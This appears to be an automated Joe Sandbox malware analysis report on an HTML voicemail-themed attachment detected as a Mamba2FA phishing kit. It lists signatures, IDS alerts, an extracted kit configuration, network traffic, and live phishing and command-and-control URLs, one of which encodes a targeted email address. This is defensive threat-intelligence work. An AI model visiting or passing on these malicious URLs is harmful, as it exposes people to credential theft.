Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U25b6#Ufe0fVmail__00_15.html

Overview

General Information

Sample name:#U25b6#Ufe0fVmail__00_15.html
renamed because original name is a hash value
Original sample name:Vmail__00_15.html
Analysis ID:1551571
MD5:0f3b46e65b743b4e63336bf7fa7a31ff
SHA1:539a318c5fa721c3d98cffd8bd4b9ea9a13be7a1
SHA256:a70eb5de31036e4180e419216e790583d8e8f659c21faab6cc1455aeae9b6b77
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Detected javascript redirector / loader
Phishing site detected (based on image similarity)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Invalid 'forgot password' link found
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#U25b6#Ufe0fVmail__00_15.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1956,i,15275357982726791337,180945757907666501,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_voice", "rand": "ZVk1d0s=", "uid": "USER21102024U52102117"}
SourceRuleDescriptionAuthorStrings
2.3.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    2.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.2.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        2.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          2.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
            Click to see the 9 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-07T21:40:07.995247+010020229301A Network Trojan was detected4.175.87.197443192.168.2.1649741TCP
            2024-11-07T21:40:45.981147+010020229301A Network Trojan was detected4.175.87.197443192.168.2.1649758TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-07T21:40:01.592594+010020566432Possible Social Engineering Attempted192.168.2.1649715188.114.97.3443TCP
            2024-11-07T21:41:21.760823+010020566432Possible Social Engineering Attempted192.168.2.1649785188.114.97.3443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8NA6BAvira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8N4dYAvira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8Ms_LAvira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MyYEAvira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8N50m&sid=YouvQDKT6G9okB_XAAB8Avira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=YouvQDKT6G9okB_XAAB8Avira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5Avira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=BbP6iaRyNQn3rw9FAAB_Avira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MnmwAvira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=YmxoENE2iMzP-htfAAB5Avira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5Avira URL Cloud: Label: malware
            Source: https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8NArj&sid=BbP6iaRyNQn3rw9FAAB_Avira URL Cloud: Label: malware
            Source: 2.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_voice", "rand": "ZVk1d0s=", "uid": "USER21102024U52102117"}

            Phishing

            barindex
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.2.pages.csv, type: HTML
            Source: Yara matchFile source: 2.0.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.4.pages.csv, type: HTML
            Source: Yara matchFile source: 2.1.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.2.pages.csv, type: HTML
            Source: Yara matchFile source: 2.0.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.4.pages.csv, type: HTML
            Source: Yara matchFile source: 2.1.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: #U25b6#Ufe0fVmail__00_15.htmlHTTP Parser: Low number of body elements: 0
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=Matcher: Found strong image similarity, brand: MICROSOFT
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Number of links: 0
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Title: Voice Mail does not match URL
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Forgot password?
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Terms of use
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: Invalid link: Privacy & cookies
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: <input type="password" .../> found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No favicon
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="author".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=HTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49758 version: TLS 1.2
            Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
            Source: Joe Sandbox ViewIP Address: 13.107.246.64 13.107.246.64
            Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.16:49758
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.16:49741
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49715 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49785 -> 188.114.97.3:443
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw== HTTP/1.1Host: kwiktestaust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /o/jsv.js HTTP/1.1Host: kwiktestaust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=05688cc8bbdbb0122f88552d85978beb
            Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kwiktestaust.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kwiktestaust.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
